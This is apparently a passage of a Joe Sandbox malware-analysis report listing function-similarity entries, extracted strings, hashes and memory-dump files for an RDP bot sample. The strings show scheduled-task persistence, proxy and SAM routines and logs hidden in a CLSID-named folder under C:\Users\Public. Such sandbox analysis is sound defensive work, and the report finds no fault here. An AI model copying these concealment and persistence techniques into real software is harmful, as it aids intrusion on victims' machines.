                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                      • API String ID: 1004003707-636894343
                                                      • Opcode ID: e2a42899c1c5944a9f729b1b8cf21693dae8af3d33541b423ce1529b3a229a29
                                                      • Instruction ID: 44e3da0a8c745a6d5ff850fd037a0a5f5d859503627212caf0e64f460e295af6
                                                      • Opcode Fuzzy Hash: e2a42899c1c5944a9f729b1b8cf21693dae8af3d33541b423ce1529b3a229a29
                                                      • Instruction Fuzzy Hash: 2A413E62B0B64795FA158B00E8607F46360BF243E8F484136EA5D0A797DF7CE699D38C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                      • API String ID: 1004003707-4168131722
                                                      • Opcode ID: f28ac3a370511aca7b6d72bdae0abc74e9b18329ff8aaa93d83dbeb4d1707fc4
                                                      • Instruction ID: 1af12ea63b443e01ac6aadffb76fcc4272cca70ad06704c042848557fea360db
                                                      • Opcode Fuzzy Hash: f28ac3a370511aca7b6d72bdae0abc74e9b18329ff8aaa93d83dbeb4d1707fc4
                                                      • Instruction Fuzzy Hash: D2412B6BB1A5CBD1FA56DF10E9603B52260AB06B88F444032DE1D06797EF3CE556C348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                      • API String ID: 1004003707-4168131722
                                                      • Opcode ID: e99d04283f27d490888ef91d9125258b00b88b98c993049e4454394497b2feb0
                                                      • Instruction ID: 792cb8600e3f9ef0ee1e851e83c85ac80c44e5a1f1f8a8e820f58e0a8be84176
                                                      • Opcode Fuzzy Hash: e99d04283f27d490888ef91d9125258b00b88b98c993049e4454394497b2feb0
                                                      • Instruction Fuzzy Hash: 98415E62B0B64795FE118B40E8603B42361BF203E8F484136DA0D0ABA7DF3DE595E39C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                      • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                      • API String ID: 285244410-4028107517
                                                      • Opcode ID: dc451bbeb70d10a428f1a1ddf5ef814284050e92ea7245ecc748ce65e9e4d9fa
                                                      • Instruction ID: 25aebade8d73d8bb258c6ba580e05bd7425ce9c24c5b7bc7b550f196ef0f2184
                                                      • Opcode Fuzzy Hash: dc451bbeb70d10a428f1a1ddf5ef814284050e92ea7245ecc748ce65e9e4d9fa
                                                      • Instruction Fuzzy Hash: 37310A68F0B54F91FE528F04E8783B92261AF46F44F498835DA4D073E2EE2EE9458348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                      • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                      • API String ID: 285244410-4028107517
                                                      • Opcode ID: ef3b3ceb12a3f53667c2b6a81f336c770fc2ff4f160bc12307bb38e19f6219eb
                                                      • Instruction ID: 3c3927183396117831832f7851149fd6721a7af436874a05ba1b25e37bfc447e
                                                      • Opcode Fuzzy Hash: ef3b3ceb12a3f53667c2b6a81f336c770fc2ff4f160bc12307bb38e19f6219eb
                                                      • Instruction Fuzzy Hash: 7031166BF0B64A85EA16DF41E8703742261AF46F84F4D8039C94D0B7A2EE2DF855C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                      • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                      • API String ID: 285244410-4028107517
                                                      • Opcode ID: 70a6b400ab43d136f8bb913114e77ac07bbc09c39c42aef76914cb310b19e105
                                                      • Instruction ID: 46befb385bf28571b5bb6932e15df5be3df4316b1568318a505b79ac33327f01
                                                      • Opcode Fuzzy Hash: 70a6b400ab43d136f8bb913114e77ac07bbc09c39c42aef76914cb310b19e105
                                                      • Instruction Fuzzy Hash: 0F311B62F0F60785FA129B05E8703B42261AF50BF4F588435C88D1B3A7EF2CE995938C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                      • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                      • API String ID: 285244410-4028107517
                                                      • Opcode ID: ede822a38d14538cb8e364980b15d9585e003f99cc1bc3662abdc9f392ac9012
                                                      • Instruction ID: 4d634feac9e88d12beaf7147f959d424e6827e66b59df6eedbaaef22520658e7
                                                      • Opcode Fuzzy Hash: ede822a38d14538cb8e364980b15d9585e003f99cc1bc3662abdc9f392ac9012
                                                      • Instruction Fuzzy Hash: 22310769F0F61BC1FA129F15E87037426A1AF42F94F984875C94D0B7A2EF2DF845A708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                      • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                      • API String ID: 285244410-4028107517
                                                      • Opcode ID: 47b1dd69969509ee7c91f39f06bda4f9918e60f96952a5c634e839784ca5ac46
                                                      • Instruction ID: d1ffc45c360566f2afd05f2e15f8a8ed1e189f421aa78b77c651d12e81b6a8ed
                                                      • Opcode Fuzzy Hash: 47b1dd69969509ee7c91f39f06bda4f9918e60f96952a5c634e839784ca5ac46
                                                      • Instruction Fuzzy Hash: E1311EABB1B90381FA539B05E8707792361BF94BE8F948435C84D0B3A6DE2CE8459349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                      • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                                      • API String ID: 3179112426-3318474754
                                                      • Opcode ID: 39f0e3e510b41dda994bd8df5e35c89b966b8dfeb2565fa66ec9c718540c44a6
                                                      • Instruction ID: 6b0cc97b17603b494dd6a773438604211695b8923a83113a0a8d8ebbddfeb1f8
                                                      • Opcode Fuzzy Hash: 39f0e3e510b41dda994bd8df5e35c89b966b8dfeb2565fa66ec9c718540c44a6
                                                      • Instruction Fuzzy Hash: 3F31BA59F0E60FA1FB234F14D8E837926509B0BB55F910836C60E463D3AE5EE989924D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                      • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                                      • API String ID: 3179112426-2019511216
                                                      • Opcode ID: 2c0f77dabb96c33064383cb08453fddfb56d301a764a10c247504a0ccd6a76f7
                                                      • Instruction ID: 015bc4d807474c2b2fbcb4922ee533b457db34b08ee2ff36b1e3b2bd1635e3c5
                                                      • Opcode Fuzzy Hash: 2c0f77dabb96c33064383cb08453fddfb56d301a764a10c247504a0ccd6a76f7
                                                      • Instruction Fuzzy Hash: 5B313C98B2F60F89FB225F1494F07B916B0AF47B04F500872D52E063939F5EB984D299
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcpy
                                                      • String ID: *$schtasks
                                                      • API String ID: 2790333442-2394224502
                                                      • Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                                      • Instruction ID: b76a8c1b71e5b140a6711715cb9db463777b72e59a8e7447f5f8aa4b09c5a1f3
                                                      • Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                                      • Instruction Fuzzy Hash: 8651B36BB0E6CBC6F763EE15A4703B956619B87B84F480031EA4E47397EE2DE8048704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                                      • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                                      • API String ID: 3537583691-1494920791
                                                      • Opcode ID: 5af6970aa5c60453f790bbfafdf9fcc29e6d040ea408ef703b880acae55e1d2c
                                                      • Instruction ID: be2078350c6026521e2bffae5d6a879f5c1a5f968e7b62405d58cf3147181be6
                                                      • Opcode Fuzzy Hash: 5af6970aa5c60453f790bbfafdf9fcc29e6d040ea408ef703b880acae55e1d2c
                                                      • Instruction Fuzzy Hash: 24418061B0AA0A97EA108F11F86437A63A0FB4AF86F544835EA4D43796DF7DE545C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
                                                      • API String ID: 513531256-1037688549
                                                      • Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                                      • Instruction ID: 0e9c5ba31d223de4a8bf454ad0d51a8de7a90cfb60e5e38056b66aaeae150568
                                                      • Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                                      • Instruction Fuzzy Hash: 6F418E69B0E68986F7229F10E8643BE2391FB86F84F410131DA4D437A7DF3DE6858748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                                      • API String ID: 513531256-4171087551
                                                      • Opcode ID: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
                                                      • Instruction ID: 26fb18c44d8d82619b04948370375e43d5250ce927e597d1979ee6d3ee0de867
                                                      • Opcode Fuzzy Hash: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
                                                      • Instruction Fuzzy Hash: 73417FA1A0864686F320BB18FC55BAAE360FF84784FC44135EA0E576D9CF3CE981C761
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$strtol
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                      • API String ID: 3596500743-1991603811
                                                      • Opcode ID: 7b3c9434b910145414a894f18d096616f5266deb4f2524f64a9b031aeacdc748
                                                      • Instruction ID: 4eb5e0878130dffa685a4d280bd85fee9a031a0b7f13d166ebdf697a14a3d6ea
                                                      • Opcode Fuzzy Hash: 7b3c9434b910145414a894f18d096616f5266deb4f2524f64a9b031aeacdc748
                                                      • Instruction Fuzzy Hash: 58219127B0AA4782F7929B11E9607AA77A0FB847E8F404031EE4C077A6DF3DD845C709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: af583f79c4fcf5353667909058698f50e495094c839aaac9be843fdc2d8586ea
                                                      • Instruction ID: 924d7d241d19345b7a744ad654d347f046fe76a931db570c66df4b110e621d2c
                                                      • Opcode Fuzzy Hash: af583f79c4fcf5353667909058698f50e495094c839aaac9be843fdc2d8586ea
                                                      • Instruction Fuzzy Hash: 0F21D025B0AA4F95E712AF15FC647AA3360BB46B84F440036EE4C477A6DF3DD945C708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: 730a57a45b21505463e24f21592d21c58803fcc4494c9fa5138c3aaa1cac760c
                                                      • Instruction ID: cec9b3293d0c7a7c89cb01993e11b4a0b7dfe5b10a34bc94ec645233223d8d52
                                                      • Opcode Fuzzy Hash: 730a57a45b21505463e24f21592d21c58803fcc4494c9fa5138c3aaa1cac760c
                                                      • Instruction Fuzzy Hash: 9A216D67B1AA8AD5E212DF15E8507AA23A0EB4AB84F444032EE4C47766DF3CD955C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
